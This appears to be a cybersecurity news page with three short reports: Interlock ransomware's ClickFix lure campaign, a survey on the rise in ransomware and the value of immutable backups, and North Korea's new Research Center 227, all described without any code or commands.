Interlock Ransomware Gang Deploys ClickFix Attacks to Breach Corporate Networks  Cybersecurity researchers have revealed that the Interlock ransomware gang has adopted a deceptive social engineering technique called ClickFix to infiltrate corporate networks. This method involves tricking users into executing malicious PowerShell commands under the guise of resolving system errors or completing identity verification steps, leading to the deployment of file-encrypting malware.  While ClickFix attacks have previously been associated with ransomware campaigns, this marks the first confirmed use by Interlock, a ransomware operation that surfaced in late September 2024. The group targets both Windows systems and FreeBSD servers and maintains a dark web leak portal to pressure victims into paying ransoms that can reach millions of dollars. Interlock does not seem to operate as a ransomware-as-a-service (RaaS) model.  According to Sekoia researchers, Interlock began using ClickFix tactics in January 2025. Attackers set up fake websites mimicking legitimate IT tools—such as Microsoft Teams and Advanced IP Scanner—to lure victims. These fake sites prompt users to click a “Fix it” button, which silently copies a malicious PowerShell script to the user’s clipboard. If run, the command downloads a 36MB PyInstaller payload that installs malware under the guise of a legitimate tool.  Researchers found the malicious campaign hosted on spoofed domains like microsoft-msteams[.]com, microstteams[.]com, ecologilives[.]com, and advanceipscaner[.]com. Only the last domain led to the actual malware dropper disguised as Advanced IP Scanner. When users unknowingly run the script, a hidden PowerShell window executes actions such as system reconnaissance, persistence via Windows Registry, and data exfiltration. The attackers deploy a range of malware via command-and-control (C2) servers, including LummaStealer, BerserkStealer, keyloggers, and the Interlock RAT—a basic remote access trojan capable of dynamic configuration, file exfiltration, shell command execution, and DLL injection.  Post-compromise, Interlock operators use stolen credentials to move laterally through networks via RDP, leveraging remote access tools like PuTTY, AnyDesk, and LogMeIn. Data is exfiltrated to Azure Blob Storage, after which the Windows variant of Interlock ransomware is scheduled to run daily at 8:00 PM—a redundancy tactic to ensure encryption if the initial payload fails. The gang’s ransom notes have also evolved, now placing emphasis on the legal and regulatory consequences of leaked data.  ClickFix attacks are gaining popularity among various cybercriminal groups, with recent reports also linking them to North Korean state-sponsored actors like the Lazarus Group, who use similar tactics to target job seekers in the cryptocurrency sector.

Interlock Ransomware Gang Deploys ClickFix Attacks to Breach Corporate Networks #CyberAttacks #CyberResearchers #DarkWeb

Ransomware Attacks Surge in Q1 2025 as Immutable Backup Emerges as Critical Defense Ransomware attacks have seen a dramatic rise in the first quarter of 2025, with new research from Object First revealing an 84% increase compared to the same period in 2024. This alarming trend highlights the growing sophistication and frequency of ransomware campaigns, with nearly two-thirds of organizations reporting at least one attack in the past two years.  The findings suggest that ransomware is no longer a matter of “if” but “when” for most businesses. Despite the increased threat, Object First’s study offers a silver lining. A large majority—81% of IT decision-makers—now recognize that immutable backup storage is the most effective defense against ransomware. Immutable storage ensures that once data is written, it cannot be changed or deleted, offering a critical safety net when other security measures fail. This form of storage plays a key role in enabling organizations to recover their data without yielding to ransom demands.  However, the report also highlights a concerning gap between awareness and action. While most IT professionals acknowledge the benefits of immutable backups, only 59% of organizations have actually implemented such storage. Additionally, just 58% maintain multiple copies of their data in separate locations, falling short of the recommended 3-2-1 backup strategy. This gap leaves many companies dangerously exposed. The report also shows that ransomware actors are evolving their methods. A staggering 96% of organizations that experienced ransomware attacks in the last two years had their backup systems targeted at least once. Even more concerning, 10% of them had their backup storage compromised in every incident.  These findings demonstrate how attackers now routinely seek to destroy recovery options, increasing pressure on victims to pay ransoms. Many businesses still place heavy reliance on traditional IT security hardening. In fact, 61% of respondents believe this approach is sufficient. But ransomware attackers are adept at bypassing such defenses using phishing emails, stolen credentials, and remote access tools. That’s why Object First recommends adopting a “breach mentality”—an approach that assumes an eventual breach and focuses on limiting damage.  A Zero Trust architecture, paired with immutable backup, is essential. Organizations are urged to segment networks, restrict user access to essential data only, and implement multi-factor authentication. As cloud services grow, many companies are also turning to immutable cloud storage for flexible, scalable protection. Together, these steps offer a stronger, more resilient defense against today’s aggressive ransomware landscape.

Ransomware Attacks Surge in Q1 2025 as Immutable Backup Emerges as Critical Defense #cloudstorage #CyberAttacks #CyberResearchers

North Korea Establishes Research Center 227 to Strengthen Cyber Warfare Capabilities  North Korea has reportedly launched a new cyber research unit, Research Center 227, as part of its efforts to enhance hacking capabilities and intelligence operations. According to Daily NK, this center is expected to function continuously, providing real-time support to North Korean intelligence agencies by developing advanced cyber tools.  The initiative highlights North Korea’s increasing reliance on cyber warfare as a key component of its broader security strategy. In February 2025, North Korean leadership directed the Reconnaissance General Bureau (RGB) under the General Staff Department to strengthen the nation’s offensive cyber capabilities. As part of this directive, Research Center 227 was formed to focus on the development of sophisticated hacking techniques and cyber warfare tools.  These efforts are primarily aimed at infiltrating foreign cybersecurity systems, disrupting critical infrastructure, and stealing sensitive data from targeted nations. The research facility will recruit approximately 90 highly skilled professionals, including graduates from top universities and individuals with advanced degrees in computer science. Unlike frontline cyber operatives who execute attacks, these researchers will focus on creating and refining malware, intrusion methods, and other offensive cyber tools.  By centralizing its cyber research efforts, North Korea aims to develop more sophisticated digital weapons that can be deployed by operational hacking units in intelligence and espionage missions. North Korea has significantly expanded its cyber operations in recent years, with its state-sponsored hacking groups, such as Lazarus, launching large-scale attacks across the globe. These groups have been responsible for financial cybercrimes, espionage, and the theft of cryptocurrency, targeting both private companies and government agencies.  Their activities have included spreading malware, infiltrating secure networks, and deploying information-stealing tools to compromise Western organizations. One particularly deceptive tactic used by North Korean hackers is the “Contagious Interview” campaign, in which cybercriminals pose as recruiters or hiring managers to manipulate professionals into downloading malicious software disguised as video conferencing applications.  This technique has allowed hackers to gain access to corporate systems and steal valuable credentials. Additionally, there have been numerous cases of North Korean operatives using false identities to secure employment in global technology firms, potentially accessing critical software infrastructure or engaging in fraudulent activities. With the establishment of Research Center 227, North Korea is likely to intensify its cyber warfare operations, making its hacking activities more strategic and efficient.  The development of custom malware, sophisticated intrusion techniques, and advanced cyber espionage methods could further increase the scale and complexity of North Korean cyberattacks. As these threats evolve, governments and cybersecurity professionals worldwide will need to bolster their defenses against the growing risks posed by North Korea’s cyber capabilities.

North Korea Establishes Research Center 227 to Strengthen Cyber Warfare Capabilities #CyberIntelligence #CyberResearchers #CyberSecurity